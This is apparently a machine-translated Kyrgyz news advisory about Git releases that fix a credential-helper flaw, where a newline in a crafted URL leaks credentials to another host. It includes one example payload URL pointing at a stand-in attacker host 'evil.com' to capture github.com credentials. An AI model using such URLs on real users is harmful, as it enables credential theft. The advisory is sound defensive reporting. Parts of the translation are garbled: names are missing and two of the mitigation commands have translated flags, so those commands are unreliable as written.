бөлүштүрүлгөн булакты башкаруу системасынын түзөтүүчү релиздери Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 жана 2.17.4, кайсынысы жок кылынды () иштеткичте "", бул git кардары жаңы сап белгисин камтыган атайын форматталган URL аркылуу репозиторийге киргенде эсептик дайындардын туура эмес хостко жөнөтүлүшүнө алып келет. Алсыздык башка хосттун эсептик дайындарын чабуулчу башкарган серверге жөнөтүү үчүн колдонсо болот.
“https://evil.com?%0ahost=github.com/” сыяктуу URL дарегин көрсөткөндө, evil.com хостуна туташуудагы эсептик маалымат иштеткич github.com үчүн көрсөтүлгөн аутентификация параметрлерин өткөрүп берет. Көйгөй "git клону", анын ичинде субмодулдар үчүн URL'дерди иштетүү сыяктуу операцияларды аткарууда пайда болот (мисалы, "git submodule update" репозиторийден .gitmodules файлында көрсөтүлгөн URL'дерди автоматтык түрдө иштетет). Иштеп чыгуучу URL дарегин көрбөй туруп репозиторийди клондогон кырдаалдарда, мисалы, субмодулдар менен иштөөдө же автоматтык аракеттерди аткарган системаларда, мисалы, топтомду түзүү скрипттеринде, аялуу эң кооптуу.
Жаңы версиялардагы кемчиликтерди бөгөттөө үчүн ишеним алмашуу протоколу аркылуу берилген ар кандай маанилерде жаңы сап белгисин өткөрүү. Бөлүштүрүү үчүн, сиз баракчалардагы пакет жаңыртууларынын чыгарылышын көзөмөлдөй аласыз , , , , , , .
Көйгөйгө бөгөт коюу үчүн убактылуу чечим катары Коомдук репозиторийлерге кирүүдө credential.helperди колдонбоңуз жана текшерилбеген репозиторийлер менен "--recurse-submodules" режиминде "git clone" колдонбоңуз. Credential.helper иштеткичти толугу менен өчүрүү үчүн жана сырсөздөрдү алуу , корголгон же сырсөздөр менен файл, сиз буйруктарды колдоно аласыз:
git config --unset credential.helper
git config --глобалдык --unset credential.helper
git config --система --unset credential.helper
Source: opennet.ru